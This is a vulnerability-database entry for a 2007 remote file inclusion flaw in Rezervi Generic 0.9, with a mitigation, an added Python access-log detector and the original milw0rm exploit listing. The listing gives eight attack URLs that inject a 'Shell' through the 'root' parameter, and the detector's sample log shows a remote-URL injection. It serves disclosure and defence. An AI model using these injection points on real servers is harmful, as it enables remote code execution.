vendor: Rezervi Generic
by: GolD_M
CVSS: 7.5 HIGH
Remote File Inclusion
CWE: 94
Product Name: Rezervi Generic
Affected Version From: 0.9
Affected Version To: 0.9
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Rezervi Generic 0.9 (root) Remote File Include Vulnerabilities

The Rezervi Generic 0.9 script is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by including a malicious file via the 'root' parameter in various files within the templates and belegungsplan directories. This allows the attacker to execute arbitrary code on the target system.

Mitigation:

To mitigate this vulnerability, sanitize user input and validate file inclusion paths. Also keep the script and all its dependencies up to date with the latest security patches.
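
Detection logic for the requests this advisory describes, added here as an example and not part of the original advisory: it scans web-server access-log lines for requests to the eight listed scripts that carry a `root` query parameter, and rates a hit higher when the value points at a remote resource. The log layout, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script paths listed in the advisory, relative to the install directory.
AFFECTED = {
    "templates/datumVonDatumBis.inc.php",
    "templates/footer.inc.php",
    "templates/header.inc.php",
    "templates/stylesheets.php",
    "belegungsplan/wochenuebersicht.inc.php",
    "belegungsplan/monatsuebersicht.inc.php",
    "belegungsplan/jahresuebersicht.inc.php",
    "belegungsplan/tagesuebersicht.inc.php",
}
# Assumed log layout: client address first, then a quoted request line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value starts with a URL scheme (http://, ftp://, php://, ...), data: or //.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*://|data:|//)", re.I)

def classify(line):
    """Return (client, script, severity) for a suspicious request, else None."""
    m = REQUEST.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    # Keep the last two path segments so any install prefix is ignored.
    script = "/".join(unquote(url.path).strip("/").split("/")[-2:])
    if script not in AFFECTED:
        return None
    # parse_qs percent-decodes, so root=http%3A%2F%2F... is caught too.
    values = parse_qs(url.query, keep_blank_values=True).get("root")
    if values is None:
        return None
    severity = "high" if any(REMOTE.match(v) for v in values) else "review"
    return client, script, severity

def scan(lines):
    """Classify every line and keep only the suspicious requests."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample lines (documentation IP ranges, placeholder host).
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Apr/2007:10:00:01 +0000] "GET /rezervi/templates/header.inc.php?root=http%3A%2F%2Fhost.example%2Fa.txt HTTP/1.1" 200 512',
    '198.51.100.4 - - [18/Apr/2007:10:00:05 +0000] "GET /rezervi/belegungsplan/tagesuebersicht.inc.php?root=../ HTTP/1.1" 200 100',
    '192.0.2.10 - - [18/Apr/2007:10:00:09 +0000] "GET /rezervi/index.php?root=http://host.example/ HTTP/1.1" 200 900',
    '192.0.2.10 - - [18/Apr/2007:10:00:12 +0000] "GET /rezervi/templates/footer.inc.php HTTP/1.1" 200 64',
]
```

Any externally supplied `root` value on these scripts is reported, because the parameter is not meant to come from the client; "review" marks values that are not remote URLs but still merit a look.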
Source

Exploit-DB raw data:

# Rezervi Generic 0.9(root)Remote File Include Vulnerabilities
# D.Script: http://www.rezervi.com/www/german/download/rezerviGenericV0_9.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/templates/datumVonDatumBis.inc.php?root=Shell
# Exploit:[Path]/templates/footer.inc.php?root=Shell
# Exploit:[Path]/templates/header.inc.php?root=Shell
# Exploit:[Path]/templates/stylesheets.php?root=Shell
# Exploit:[Path]/belegungsplan/wochenuebersicht.inc.php?root=Shell
# Exploit:[Path]/belegungsplan/monatsuebersicht.inc.php?root=Shell
# Exploit:[Path]/belegungsplan/jahresuebersicht.inc.php?root=Shell
# Exploit:[Path]/belegungsplan/tagesuebersicht.inc.php?root=Shell
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# Thanx To : RootShell-Team.Info & Alkomandoz Hacker 

# milw0rm.com [2007-04-18]